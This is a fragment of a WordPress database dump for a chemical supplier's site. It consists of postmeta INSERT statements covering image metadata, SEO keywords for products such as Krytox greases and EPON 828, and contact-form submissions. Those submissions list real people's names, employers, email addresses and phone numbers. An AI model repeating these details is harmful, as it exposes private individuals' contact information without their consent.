"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_405633937-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_405633937-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (23276, 2552, '_thumbnail_id', '2553'); 
INSERT INTO `wp_postmeta` VALUES (23278, 2552, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (23279, 2552, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (23280, 2552, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (23281, 2552, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23282, 2552, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (23283, 2552, '_yoast_wpseo_focuskw_text_input', 'MIL PRF-27617 Greases'); 
INSERT INTO `wp_postmeta` VALUES (23284, 2552, '_yoast_wpseo_focuskw', 'MIL PRF-27617 Greases'); 
INSERT INTO `wp_postmeta` VALUES (23285, 2552, '_yoast_wpseo_title', 'Krytox™ MIL PRF-27617 Greases - 240 AZ - 240 AB - 240 AC'); 
INSERT INTO `wp_postmeta` VALUES (23286, 2552, '_yoast_wpseo_metadesc', 'Krytox™ 240 AC, 240 AB, and 240 AZ gr-1 are MIL PRF-27617 greases and now have NSF approval for incidental food contact (H-1) in and around food processing.'); 
INSERT INTO `wp_postmeta` VALUES (23287, 2552, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23288, 2552, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (23289, 2552, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (23291, 2552, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23296, 2566, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23297, 2566, '_seq_num', '48'); 
INSERT INTO `wp_postmeta` VALUES (23298, 2566, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23299, 2566, '_field_1', 'Sean Curry'); 
INSERT INTO `wp_postmeta` VALUES (23300, 2566, '_field_10', 'Raym-Co'); 
INSERT INTO `wp_postmeta` VALUES (23301, 2566, '_field_2', 'scurry@raymco.com'); 
INSERT INTO `wp_postmeta` VALUES (23302, 2566, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (23303, 2566, '_field_3', 'Im looking for updated sds sheets for two part epoxy 907 part a and part b.\r\n\r\nThanks'); 
INSERT INTO `wp_postmeta` VALUES (23304, 2566, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23305, 2566, '_sub_id', '2566'); 
INSERT INTO `wp_postmeta` VALUES (23309, 2567, '_wp_attached_file', '2016/08/MS-475C_477C-2.pdf'); 
INSERT INTO `wp_postmeta` VALUES (23310, 2569, '_wp_attached_file', '2016/09/MS-487G.pdf'); 
INSERT INTO `wp_postmeta` VALUES (23311, 1723, '_wp_attachment_image_alt', 'Conductive coating'); 
INSERT INTO `wp_postmeta` VALUES (23312, 2570, '_wp_attached_file', '2016/09/shutterstock_418090675.jpg'); 
INSERT INTO `wp_postmeta` VALUES (23313, 2570, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5150;s:6:"height";i:3433;s:4:"file";s:34:"2016/09/shutterstock_418090675.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_418090675-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_418090675-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_418090675-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_418090675-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_418090675-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_418090675-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_418090675-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_418090675-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (23314, 2570, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23315, 1722, '_wp_old_slug', 'shieldsys-rfi-nickel-conductive-coating'); 
INSERT INTO `wp_postmeta` VALUES (23316, 1722, '318_custom_list_file', 'a:1:{s:32:"a0827579cf30f3738795c4ed3631d621";a:3:{s:4:"name";s:7:"MS-487G";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-487G.pdf";s:4:"desc";s:11:"MS-487G TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (23317, 1722, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23318, 1722, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23319, 1722, '_yoast_wpseo_primary_product_cat', '511'); 
INSERT INTO `wp_postmeta` VALUES (23320, 1722, '_yoast_wpseo_focuskw_text_input', 'Nickel Conductive Coatings'); 
INSERT INTO `wp_postmeta` VALUES (23321, 1722, '_yoast_wpseo_focuskw', 'Nickel Conductive Coatings'); 
INSERT INTO `wp_postmeta` VALUES (23322, 1722, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23323, 1722, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-487G","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (23324, 1722, '_yoast_wpseo_linkdex', '89'); 
INSERT INTO `wp_postmeta` VALUES (23326, 1920, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23327, 1152, '_wp_old_slug', 'ms-111-epoxy-stripping-agent'); 
INSERT INTO `wp_postmeta` VALUES (23328, 1152, '_yoast_wpseo_focuskw_text_input', 'Epoxy Stripping Agent'); 
INSERT INTO `wp_postmeta` VALUES (23329, 1152, '_yoast_wpseo_focuskw', 'Epoxy Stripping Agent'); 
INSERT INTO `wp_postmeta` VALUES (23330, 2572, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23331, 2572, '_seq_num', '44'); 
INSERT INTO `wp_postmeta` VALUES (23332, 2572, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23333, 2572, '_field_12', 'Susan Szucs'); 
INSERT INTO `wp_postmeta` VALUES (23334, 2572, '_field_13', 'Gowanda Electronics'); 
INSERT INTO `wp_postmeta` VALUES (23335, 2572, '_field_18', '65'); 
INSERT INTO `wp_postmeta` VALUES (23336, 2572, '_field_14', 'sszucs@gowanda.com'); 
INSERT INTO `wp_postmeta` VALUES (23337, 2572, '_field_15', '(716) 532-2234'); 
INSERT INTO `wp_postmeta` VALUES (23338, 2572, '_field_16', 'Requesting an SDS for your product:  Epoxy 907 Two Part Epoxy, Part A and Part B'); 
INSERT INTO `wp_postmeta` VALUES (23339, 2572, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23340, 2572, '_sub_id', '2572'); 
INSERT INTO `wp_postmeta` VALUES (23352, 1293, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23355, 577, '_wp_old_slug', 'vazo-88'); 
INSERT INTO `wp_postmeta` VALUES (23356, 577, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23357, 577, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23358, 577, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23359, 577, '_yoast_wpseo_focuskw_text_input', 'Vazo 88 radical initiator'); 
INSERT INTO `wp_postmeta` VALUES (23360, 577, '_yoast_wpseo_focuskw', 'Vazo 88 radical initiator'); 
INSERT INTO `wp_postmeta` VALUES (23361, 577, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23362, 577, '_yoast_wpseo_focuskeywords', '[{"keyword":"ACHN","score":"na"}]'); 
INSERT INTO `wp_postmeta` VALUES (23371, 1291, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23377, 474, '_wp_old_slug', 'fluoroextreme-dental-lubricant'); 
INSERT INTO `wp_postmeta` VALUES (23380, 1115, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (23381, 1115, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23382, 1115, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (23383, 1115, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23384, 1115, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (23385, 1115, '_yoast_wpseo_primary_category', ''); 
INSERT INTO `wp_postmeta` VALUES (23391, 1135, '_wp_old_slug', 'opteon-sion-vapor-degreasing'); 
INSERT INTO `wp_postmeta` VALUES (23398, 2613, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23399, 2613, '_seq_num', '49'); 
INSERT INTO `wp_postmeta` VALUES (23400, 2613, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23401, 2613, '_field_1', 'Yang Lu'); 
INSERT INTO `wp_postmeta` VALUES (23402, 2613, '_field_10', 'LAMAR UNIVERSITY'); 
INSERT INTO `wp_postmeta` VALUES (23403, 2613, '_field_2', 'lukeyangcn@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (23404, 2613, '_field_8', '(832) 363-7441'); 
INSERT INTO `wp_postmeta` VALUES (23405, 2613, '_field_3', 'Hi, I&#039;m a graduate student at Lamar University in Beaumont, Texas.  I want to ask for the price quote for EPON™ 828 and EPIKURE™ 3223. Thanks.\r\n\r\nYang Lu'); 
INSERT INTO `wp_postmeta` VALUES (23406, 2613, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23407, 2613, '_sub_id', '2613'); 
INSERT INTO `wp_postmeta` VALUES (23411, 1434, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23412, 568, '_wp_old_slug', 'vazo-52'); 
INSERT INTO `wp_postmeta` VALUES (23413, 568, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23414, 568, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23415, 568, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23416, 568, '_yoast_wpseo_focuskw_text_input', 'Vazo 52'); 
INSERT INTO `wp_postmeta` VALUES (23417, 568, '_yoast_wpseo_focuskw', 'Vazo 52'); 
INSERT INTO `wp_postmeta` VALUES (23418, 568, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23419, 568, '_yoast_wpseo_focuskeywords', '[{"keyword":"azo free radical initiator","score":"good"},{"keyword":"polymerization","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (23420, 1732, '_wp_attachment_image_alt', '114D'); 
INSERT INTO `wp_postmeta` VALUES (23421, 623, '_wp_old_slug', 'ms-114c'); 
INSERT INTO `wp_postmeta` VALUES (23422, 623, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23423, 623, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23424, 623, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23425, 623, '_yoast_wpseo_focuskw_text_input', 'Conformal Coating Stripper'); 
INSERT INTO `wp_postmeta` VALUES (23426, 623, '_yoast_wpseo_focuskw', 'Conformal Coating Stripper'); 
INSERT INTO `wp_postmeta` VALUES (23427, 623, '_yoast_wpseo_title', 'Conformal Coating Stripper | Stripping Agent | Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (23428, 623, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23429, 623, '_yoast_wpseo_focuskeywords', '[{"keyword":"stripping agent","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (23430, 623, '_yoast_wpseo_linkdex', '91'); 
INSERT INTO `wp_postmeta` VALUES (23431, 1344, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23432, 1344, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23433, 1344, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23434, 1344, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23435, 1344, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23436, 1344, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (23437, 1287, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23438, 1287, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23439, 1287, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23440, 1287, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23441, 1287, '_yoast_wpseo_focuskw_text_input', 'Opteon Sion'); 
INSERT INTO `wp_postmeta` VALUES (23442, 1287, '_yoast_wpseo_focuskw', 'Sion'); 
INSERT INTO `wp_postmeta` VALUES (23443, 1287, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23444, 1287, '_yoast_wpseo_focuskeywords', '[{"keyword":"Opteon","score":"ok"},{"keyword":"Opteon Sion","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (23445, 1287, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23446, 2618, '_edit_lock', '1476382567:3'); 
INSERT INTO `wp_postmeta` VALUES (23447, 2618, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (23448, 2619, '_wp_attached_file', '2016/10/shutterstock_310575989.jpg'); 
INSERT INTO `wp_postmeta` VALUES (23449, 2619, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:34:"2016/10/shutterstock_310575989.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_310575989-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_310575989-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_310575989-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_310575989-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_310575989-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_310575989-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_310575989-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_310575989-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (23450, 2618, '_thumbnail_id', '2619'); 
INSERT INTO `wp_postmeta` VALUES (23452, 2618, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (23453, 2618, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (23454, 2618, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23455, 2618, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (23456, 2618, '_yoast_wpseo_focuskw_text_input', 'n-propyl bromide replacement'); 
INSERT INTO `wp_postmeta` VALUES (23457, 2618, '_yoast_wpseo_focuskw', 'Specialty Solvent'); 
INSERT INTO `wp_postmeta` VALUES (23458, 2618, '_yoast_wpseo_title', 'Specialty Solvent Retrofit Guideline for Opteon™ Sion'); 
INSERT INTO `wp_postmeta` VALUES (23459, 2618, '_yoast_wpseo_metadesc', 'The following provides a summary of the basic retrofit guideline for Opteon™ Sion, specialty solvent; detailed discussion of each step.'); 
INSERT INTO `wp_postmeta` VALUES (23460, 2618, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23461, 2618, '_yoast_wpseo_focuskeywords', '[{"keyword":"trichloroethylene replacement","score":"ok"},{"keyword":"n-propyl bromide replacement","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (23462, 2618, '_yoast_wpseo_primary_category', '212'); 
INSERT INTO `wp_postmeta` VALUES (23464, 2618, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23467, 2622, '_wp_attached_file', '2016/09/liquid-density-opteon-suprion.jpg'); 
INSERT INTO `wp_postmeta` VALUES (23468, 2622, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:517;s:6:"height";i:333;s:4:"file";s:41:"2016/09/liquid-density-opteon-suprion.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:41:"liquid-density-opteon-suprion-340x333.jpg";s:5:"width";i:340;s:6:"height";i:333;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:41:"liquid-density-opteon-suprion-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:41:"liquid-density-opteon-suprion-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:41:"liquid-density-opteon-suprion-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:41:"liquid-density-opteon-suprion-510x333.jpg";s:5:"width";i:510;s:6:"height";i:333;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (23469, 2623, '_wp_attached_file', '2016/09/liquid-viscosity-opteon-suprion.jpg'); 
INSERT INTO `wp_postmeta` VALUES (23470, 2623, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:533;s:6:"height";i:335;s:4:"file";s:43:"2016/09/liquid-viscosity-opteon-suprion.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"liquid-viscosity-opteon-suprion-340x335.jpg";s:5:"width";i:340;s:6:"height";i:335;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"liquid-viscosity-opteon-suprion-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"liquid-viscosity-opteon-suprion-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"liquid-viscosity-opteon-suprion-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:43:"liquid-viscosity-opteon-suprion-510x335.jpg";s:5:"width";i:510;s:6:"height";i:335;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (23472, 2618, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (23473, 1344, '_wp_old_slug', 'suprion'); 
INSERT INTO `wp_postmeta` VALUES (23474, 1344, '_yoast_wpseo_focuskw_text_input', 'Suprion'); 
INSERT INTO `wp_postmeta` VALUES (23475, 1344, '_yoast_wpseo_focuskw', 'Suprion'); 
INSERT INTO `wp_postmeta` VALUES (23476, 1344, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23477, 1893, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23478, 877, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23479, 877, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23480, 877, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23481, 877, '_yoast_wpseo_focuskw_text_input', 'Epon 828'); 
INSERT INTO `wp_postmeta` VALUES (23482, 877, '_yoast_wpseo_focuskw', 'Epon 828'); 
INSERT INTO `wp_postmeta` VALUES (23483, 877, '_yoast_wpseo_metadesc', 'EPON 828 Resin is an undiluted clear difunctional bisphenol A/epichlorohydrin derived liquid epoxy resin. Medium viscosity, high versatility, good adhesion'); 
INSERT INTO `wp_postmeta` VALUES (23484, 877, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23485, 877, '_yoast_wpseo_focuskeywords', '[{"keyword":"Difunctional Liquid Epoxy Resin","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (23486, 2627, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23487, 2627, '_seq_num', '45'); 
INSERT INTO `wp_postmeta` VALUES (23488, 2627, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23489, 2627, '_field_12', 'mabel'); 
INSERT INTO `wp_postmeta` VALUES (23490, 2627, '_field_13', 'Bohringer'); 
INSERT INTO `wp_postmeta` VALUES (23491, 2627, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23492, 2627, '_field_14', 'mabel.bohringer.ctr@us.af.mil'); 
INSERT INTO `wp_postmeta` VALUES (23493, 2627, '_field_15', '(951) 655-4811'); 
INSERT INTO `wp_postmeta` VALUES (23494, 2627, '_field_16', 'please email me a SDS for MS780 Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (23495, 2627, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23496, 2627, '_sub_id', '2627'); 
INSERT INTO `wp_postmeta` VALUES (23497, 1357, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23498, 469, '_wp_old_slug', 'fluoropolymer-coatings'); 
INSERT INTO `wp_postmeta` VALUES (23499, 469, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23500, 469, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23501, 469, '_yoast_wpseo_primary_product_cat', '523'); 
INSERT INTO `wp_postmeta` VALUES (23502, 469, '_yoast_wpseo_focuskw_text_input', 'Fluoropolymer Medical Coatings'); 
INSERT INTO `wp_postmeta` VALUES (23503, 469, '_yoast_wpseo_focuskw', 'Fluoropolymer Medical Coatings'); 
INSERT INTO `wp_postmeta` VALUES (23504, 469, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23505, 469, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (23508, 2630, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23509, 2630, '_seq_num', '46'); 
INSERT INTO `wp_postmeta` VALUES (23510, 2630, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23511, 2630, '_field_12', 'AMANDA HAINES'); 
INSERT INTO `wp_postmeta` VALUES (23512, 2630, '_field_13', 'TELEDYNE'); 
INSERT INTO `wp_postmeta` VALUES (23513, 2630, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23514, 2630, '_field_14', 'amanda.haines@teledyne.com'); 
INSERT INTO `wp_postmeta` VALUES (23515, 2630, '_field_15', '(916) 636-7593'); 
INSERT INTO `wp_postmeta` VALUES (23516, 2630, '_field_16', 'looking for a current SDS for Connector Cleaner MS-181N/C02 \nP/N: 800799\n'); 
INSERT INTO `wp_postmeta` VALUES (23517, 2630, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23518, 2630, '_sub_id', '2630'); 
INSERT INTO `wp_postmeta` VALUES (23519, 2631, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23520, 2631, '_seq_num', '47'); 
INSERT INTO `wp_postmeta` VALUES (23521, 2631, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23522, 2631, '_field_12', 'Karen Ruhl'); 
INSERT INTO `wp_postmeta` VALUES (23523, 2631, '_field_13', 'AeroVironment, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (23524, 2631, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23525, 2631, '_field_14', 'ruhl@avinc.com'); 
INSERT INTO `wp_postmeta` VALUES (23526, 2631, '_field_15', '(805) 206-8626'); 
INSERT INTO `wp_postmeta` VALUES (23527, 2631, '_field_16', 'Please email to me a SDS for Conformal Coat, Acrylic MS-465C\nand Conformal Coat, Urethane MS-470C\nThank you in advance.\nRegards,\nKaren\n\n'); 
INSERT INTO `wp_postmeta` VALUES (23528, 2631, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23529, 2631, '_sub_id', '2631'); 
INSERT INTO `wp_postmeta` VALUES (23530, 2632, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23531, 2632, '_seq_num', '50'); 
INSERT INTO `wp_postmeta` VALUES (23532, 2632, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23533, 2632, '_field_1', 'Nicholas'); 
INSERT INTO `wp_postmeta` VALUES (23534, 2632, '_field_10', 'USAF'); 
INSERT INTO `wp_postmeta` VALUES (23535, 2632, '_field_2', 'Nicholas.Laksbergs@us.af.mil'); 
INSERT INTO `wp_postmeta` VALUES (23536, 2632, '_field_8', ''); 
